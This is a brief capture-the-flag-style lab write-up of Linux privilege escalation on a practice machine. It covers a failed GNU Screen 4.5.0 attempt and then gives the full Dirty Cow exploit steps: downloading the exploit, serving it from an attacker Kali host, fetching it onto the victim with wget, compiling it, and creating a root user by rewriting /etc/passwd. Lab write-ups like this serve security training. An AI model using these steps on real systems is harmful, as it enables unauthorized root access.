Privilege escalation

Trying to exploit GNU screen 4.5.0

GNU Screen 4.5.0 - Local Privilege EscalationExploit Database

Didn't elevate the privilege.

Trying Dirty Cow attack

GitHub - firefart/dirtycow: Dirty Cow exploit - CVE-2016-5195GitHub

First, check whether GCC is installed or not.

which gcc

If you found that gcc is installed, you can try running the DirtyCow exploit.

wget https://raw.githubusercontent.com/firefart/dirtycow/refs/heads/master/dirty.c
python3 -m http.server 80

send it to victim machine.

cd /tmp && wget http://$IP_KALI/dirty.c

Now run the file to make new user.

gcc -pthread dirty.c -o dirty -lcrypt

./dirty

www-data@offsecsrv:/tmp$ ./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: admin

Complete line:
firefart:fikF6I.XwWM36:0:0:pwned:/root:/bin/bash

mmap: b7861000

In my case, New User name is firefart and password is admin.

Now start the new shell (Don't forget to stabilize it as you did before).

su firefart

# Password: admin

Got the root shell using firefart.

Previoushttp [Initial-access]Nextlocal.txt and proof.txt

Last updated 1 year ago

hashtagTrying to exploit GNU screen 4.5.0

hashtagTrying Dirty Cow attack

Trying to exploit GNU screen 4.5.0

Trying Dirty Cow attack